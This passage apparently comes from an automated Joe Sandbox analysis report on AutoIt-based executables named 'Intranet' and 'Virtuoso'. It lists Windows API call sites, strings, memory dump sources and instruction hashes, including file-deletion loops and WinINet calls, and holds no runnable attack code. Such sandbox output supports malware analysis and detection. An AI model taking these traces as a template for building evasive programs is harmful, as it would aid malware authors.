                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 004F0375
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                              • Part of subcall function 004C09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004C09E4
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X
                                                                            • API String ID: 3777226403-3081909835
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00526FC7
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00526FD6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005031C9
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005031E8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0051202F,?,?,?), ref: 005128F8
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00512921
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcscmp
                                                                            • String ID: 0.0.0.0$L,S
                                                                            • API String ID: 856254489-2043881370
                                                                            APIs
                                                                              • Part of subcall function 005186E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0051849D,?,00000000,?,?), ref: 005186F7
                                                                            • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005184A0
                                                                            • #9.WSOCK32(00000000,?,00000000), ref: 005184DD
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 626452242-2422070025
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?,?,?,ListBox,?,?,ComboBox), ref: 004F9A2B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004ABC07
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • _wcscat.LIBCMT ref: 004E3593
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FullNamePath_memmove_wcscat
                                                                            • String ID: sV
                                                                            • API String ID: 257928180-1647004264
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000180,00000000,?,?,?,ListBox,?,?,ComboBox), ref: 004F9923
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            APIs
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004FB79A: GetClassNameW.USER32(?,?,000000FF), ref: 004FB7BD
                                                                            • SendMessageW.USER32(?,00000182,?,00000000,?,?,ListBox,?,?,ComboBox), ref: 004F99A6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __calloc_crt
                                                                            • String ID: @bV
                                                                            • API String ID: 3494438863-1511565622
                                                                            • Opcode ID: f9e42cb03f7cb983a5a1ceb8c8c58bf7c68039268b21284ae509efe7e00b88a6
                                                                            • Instruction ID: 3fd70a499cbbc95862f051c8e40fdb1cdb19477bc4f7de741d352fe48b35b637
                                                                            • Opcode Fuzzy Hash: f9e42cb03f7cb983a5a1ceb8c8c58bf7c68039268b21284ae509efe7e00b88a6
                                                                            • Instruction Fuzzy Hash: 2BF0A47931C2168BE7B48F1DFC21FA227D5E764328F11916FF102CB288E77888815688
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp
                                                                            • String ID: #32770
                                                                            • API String ID: 2292705959-463685578
                                                                            • Opcode ID: 7685dcec8ec61bc30e4781fac99b10533f1b4a2ef5e975bd9358833b4d0846a6
                                                                            • Instruction ID: cc07aa38f17dc0e071433013f275ec8de6e3bd8b110fa90ca2d2987b54478cd5
                                                                            • Opcode Fuzzy Hash: 7685dcec8ec61bc30e4781fac99b10533f1b4a2ef5e975bd9358833b4d0846a6
                                                                            • Instruction Fuzzy Hash: 8CE0613650032827D720AA59AC09FABFBACEB15731F00001BFC04D3051E560A90487E0
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004F88A0
                                                                              • Part of subcall function 004C3588: _doexit.LIBCMT ref: 004C3592
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: b4a4943bc6e44e06bf3c6eda5e12be06b05aeb48d4fcacf01b460c5140c86f39
                                                                            • Instruction ID: be1cf1c06075e4b68f837cfec656d73ec0fe93f36c4fce04f9989aa5f782e2bd
                                                                            • Opcode Fuzzy Hash: b4a4943bc6e44e06bf3c6eda5e12be06b05aeb48d4fcacf01b460c5140c86f39
                                                                            • Instruction Fuzzy Hash: 76D0C23128031832C25032E66C1BFCA2A488B06B55F00442FBB08651C349D9898441AD
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 004E0091
                                                                              • Part of subcall function 0051C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,004E027A,?), ref: 0051C6E7
                                                                              • Part of subcall function 0051C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0051C6F9
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 004E0289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                            • String ID: WIN_XPe
                                                                            • API String ID: 582185067-3257408948
                                                                            • Opcode ID: 21b1d44cb00d30d78af85f1a718b3f88e7cfc42fb617f2e9478837a79aa66e8b
                                                                            • Instruction ID: 7f4e130e97d7a2177d5efce639fa427fc4510818cbcce88f7a93dbace94b0486
                                                                            • Opcode Fuzzy Hash: 21b1d44cb00d30d78af85f1a718b3f88e7cfc42fb617f2e9478837a79aa66e8b
                                                                            • Instruction Fuzzy Hash: 8BF0ED70800149CFCB21CBA1D998BEDBBF8AB48301F200082E252B2290CBB84FC4DF25
                                                                            APIs
                                                                            • DestroyIcon.USER32(,zV0zV,00567A2C,00567890,?,004B5A53,00567A2C,00567A30,?,00000004), ref: 004B5823
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyIcon
                                                                            • String ID: ,zV0zV$SZK,zV0zV
                                                                            • API String ID: 1234817797-1785309768
                                                                            • Opcode ID: 3b0cd1cd7feb28445eb8fdfd15d6133d350d81617a764624ab831405f21d8e90
                                                                            • Instruction ID: 4f8705c0f1ebcacbeffda30560c5fcf1dab07b2947cb98d2ca0ca6989ee0f902
                                                                            • Opcode Fuzzy Hash: 3b0cd1cd7feb28445eb8fdfd15d6133d350d81617a764624ab831405f21d8e90
                                                                            • Instruction Fuzzy Hash: 68E01232414246EBE7213F49D8007D5FBE8EF69321F648457E48456251D3B968B0DBA9
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00509EB5
                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00509ECC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 1656de1e89d30ec45214b8dcbd70ed6a7714e91da4d48ae15b56743966e96aee
                                                                            • Instruction ID: ad22ab7ff5d560013a8f08040ed97618091b5802b5dd025700ff1809011f6e67
                                                                            • Opcode Fuzzy Hash: 1656de1e89d30ec45214b8dcbd70ed6a7714e91da4d48ae15b56743966e96aee
                                                                            • Instruction Fuzzy Hash: F6D05E7954030DABDBA0AB90DC0EFDBBB2CEB14701F0042A2BE58911E2DA7055A89B91
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000,00000111,000001A0,00000000), ref: 00525FEB
                                                                            • PostMessageW.USER32(00000000), ref: 00525FF2
                                                                              • Part of subcall function 005057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 408ee026972f781006651a2ff12524d5ce44e0a50ccbe63903c07de653852687
                                                                            • Instruction ID: 51141600fe842c63f6b060d026ab051cbdbd7683ced8a85322f891ab154b129d
                                                                            • Opcode Fuzzy Hash: 408ee026972f781006651a2ff12524d5ce44e0a50ccbe63903c07de653852687
                                                                            • Instruction Fuzzy Hash: 01D0A932380711AAF664A7309C2FFCB2A10BB50B40F000825B246EA2C0C9E06808CB04
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00525FAB
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00525FBE
                                                                              • Part of subcall function 005057FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 9ca2428d7fd8afc2cdccd99df02c91bd16a12cbae4a361ff2ad784a946d51a04
                                                                            • Instruction ID: 132c4dcd4d8ef2ce5239247fa8e26f60fd56a9f139cbd2601a0df162798b0918
                                                                            • Opcode Fuzzy Hash: 9ca2428d7fd8afc2cdccd99df02c91bd16a12cbae4a361ff2ad784a946d51a04
                                                                            • Instruction Fuzzy Hash: 24D0A932380711AAE664A7309C2FFDB2E10BB50B40F000825B24AAA2C0C9E05808CB00
                                                                            APIs
                                                                              • Part of subcall function 001A0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00192A58,?,00008000), ref: 001A02A4
                                                                              • Part of subcall function 001E4FEC: GetFileAttributesW.KERNEL32(?,001E3BFE), ref: 001E4FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001E407C
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 001E40CC
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 001E40DD
                                                                            • FindClose.KERNEL32(00000000), ref: 001E40F4
                                                                            • FindClose.KERNEL32(00000000), ref: 001E40FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 417f00bb5a8a652b4d02066ea21fb44512aa8c22b395407d392c0d5f7e2acf50
                                                                            • Instruction ID: c11b472f3fbda1c9b57c816cd65bced14a08048c58745d881de0dc0c1aa49223
                                                                            • Opcode Fuzzy Hash: 417f00bb5a8a652b4d02066ea21fb44512aa8c22b395407d392c0d5f7e2acf50
                                                                            • Instruction Fuzzy Hash: B2316131008386ABC705EF64D8959EFB7A8BEA5304F444A2DF9E582191EB34DA49C762
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0020A0F7
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0020A1B0
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0020A1CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: cd0f676a1c2463c424ecc83582ade92a7ad233a54589ca49a6fec2ec9a7b8983
                                                                            • Instruction ID: 3fa61d6259e1269c6d08ee313754305259137d48aabdb40538665ea6be4699c5
                                                                            • Opcode Fuzzy Hash: cd0f676a1c2463c424ecc83582ade92a7ad233a54589ca49a6fec2ec9a7b8983
                                                                            • Instruction Fuzzy Hash: 4202E030128302AFDB15CF18D888BAABBE5FF45314F84852DF995962E2C7B5D960CF52
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?), ref: 001E009A
                                                                            • LoadStringW.USER32(00000000,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?,00000001,?,001F3FF9,00000040,00000064), ref: 001E00A3
                                                                              • Part of subcall function 00191A36: _memmove.LIBCMT ref: 00191A77
                                                                            • GetModuleHandleW.KERNEL32(00000000,00247310,?,00000FFF,?,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?,00000001), ref: 001E00C5
                                                                            • LoadStringW.USER32(00000000,?,001CF8B8,00000001,0000138C,00000001,?,00000001,?,001F3FF9,?,00000001,?,001F3FF9,00000040,00000064), ref: 001E00C8
                                                                            • __swprintf.LIBCMT ref: 001E0118
                                                                            • __swprintf.LIBCMT ref: 001E0129
                                                                            • _wprintf.LIBCMT ref: 001E01D2
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00213B88,?), ref: 001E01E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: dc54b4686f8704179ee32cc30d7c9021d11d443be160098435ea6725a40fcabe
                                                                            • Instruction ID: 58f83974fe4456e1d80b9ec6ed68f2cf982ff85629cbb23248d40477e02849af
                                                                            • Opcode Fuzzy Hash: dc54b4686f8704179ee32cc30d7c9021d11d443be160098435ea6725a40fcabe
                                                                            • Instruction Fuzzy Hash: F641907280011ABACF15FBE0CD86EEEB378AF29340F500165F501B2092EB746F89CB61
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0020982C,?,?), ref: 0020C0C8
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C0DF
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C0EA
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C0F7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0020C100
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C10F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0020C118
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C11F
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C130
                                                                            • #418.OLEAUT32(?,00000000,00000000,00213C7C,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C149
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0020C159
                                                                            • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C17D
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C1A8
                                                                            • DeleteObject.GDI32(00000000,00000000,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C1D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000,00000000,?,?,?,?,?,0020982C,?,?,00000000,?), ref: 0020C1E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 2779716855-0
                                                                            • Opcode ID: 3e494b7244889ccc1549c71f1437fcc0937497b63feb3883f583db6f896c41a3
                                                                            • Instruction ID: f3591bd3dbc1c9bffa309c5bb0132eb61faa1911a7230019962fc0f61b19639c
                                                                            • Opcode Fuzzy Hash: 3e494b7244889ccc1549c71f1437fcc0937497b63feb3883f583db6f896c41a3
                                                                            • Instruction Fuzzy Hash: 0E415E71500209FFCB118F64EC8CEAEBBB9EF99711F108158F909D7291CB719981DB60
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008,00000000), ref: 0018260D
                                                                            • SetTextColor.GDI32(?,000000FF,00000000), ref: 00182617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0018262C
                                                                            • GetStockObject.GDI32(00000005), ref: 00182634
                                                                            • GetClientRect.USER32(?), ref: 001BC0FC
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 001BC113
                                                                            • GetWindowDC.USER32(?), ref: 001BC11F
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 001BC12E
                                                                            • ReleaseDC.USER32(?,00000000), ref: 001BC140
                                                                            • GetSysColor.USER32(00000005), ref: 001BC15E
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3380271891.0000000000181000.00000020.00000001.01000000.00000009.sdmp, Offset: 00180000, based on PE: true
                                                                            • Associated: 00000016.00000002.3380202912.0000000000180000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000210000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380361383.0000000000236000.00000002.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000240000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380421487.0000000000244000.00000008.00000001.01000000.00000009.sdmp
                                                                            • Associated: 00000016.00000002.3380524092.0000000000249000.00000002.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_180000_Virtuoso.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 3430376129-0
                                                                            • Opcode ID: ba37b0d58384107e7fcfa9442c02ae9126572a5635d2d2f083301b55134be59d
                                                                            • Instruction ID: 06ca1a6b48c5639b4d8a6bc585c8159b591232bb328d6741ac76c3effcc124c1
                                                                            • Opcode Fuzzy Hash: ba37b0d58384107e7fcfa9442c02ae9126572a5635d2d2f083301b55134be59d
